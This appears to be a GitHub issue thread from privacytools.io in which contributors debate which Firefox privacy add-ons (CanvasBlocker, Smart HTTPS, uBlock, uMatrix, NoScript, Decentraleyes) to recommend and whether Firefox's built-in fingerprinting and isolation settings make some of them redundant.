That doesn't seem like a very good idea for security addons, like the ones discussed here. Older versions could have security flaws; in addition some, like Nano Adblocker and Defender as well as Redirect AMP to HTML, don't have compatible older versions, period.
> Also, I just want to say I tried to configure all these with Waterfox and it didn't go so well as its extension API is still based on Firefox 57. I tried it due to some people voicing concerns about Mozilla's recent choices with respect to privacy.
I think we should adjust to Mozilla's choices; they started to make Firefox more efficient, so I think we should just wait for them to rise up more.
I believe their choices may sometimes be disappointing for paranoid users, but some of them are really necessary. For example, people are concerned about telemetry, but telemetry is exactly what made Chrome this fast. Software vendors can't blindly develop their products; they should know the problems, especially since very few people report bugs frequently.
Or about old addons: I agree that some of them were great, but with this decision Mozilla will waste less time on compatibility fixes and spend more resources on developing the core browser.
> Lastly, privacytools.io has added CanvasBlocker to its recommended list as of late, but there seem to be several alternatives to the HTTPS forcing, canvas fingerprinting protection, cookie purging/isolating and URL decluttering/cleaning extensions available, such as Smart HTTPS. Curious to know what you guys think would be the best combination of the four. Also the guy who made Smart HTTPS has fingerprint protection extensions for WebGL and certain types of audio content; didn't even know those could be fingerprinted.
I think the first party isolation, prevent fingerprinting and clear data on exit options in Firefox are sufficient for that, because every action you take for prevention makes your fingerprint more unique, so we should just use them to get lost in our crowd.
Especially since it has canvas prevention built in, and cookie, web storage and ... separation built in (first party isolation), plus many more.
I'm closing this issue because I believe our extensions list is fairly comprehensive with no significant overlap of tasks.
It is getting rather long! But ... reading through, I see there is variation over time, as add-ons are improved, abandoned or new ones added. Is there a need for PT to do a regular review of such add-ons, say quarterly, or more realistically, annually?
And should this be raised as a separate issue?
I think you may be looking for https://github.com/privacytoolsIO/privacytools.io/issues/1328 or something listed there.
Hi guys,
I've been removing several Firefox addons in the past weeks because they were redundant with each other. We should not recommend several Firefox addons that are doing the same job. I'm not sure about these four addons at the moment: uBlock, Decentraleyes, uMatrix and NoScript.
Please help me out. Should we remove some more?
Thanks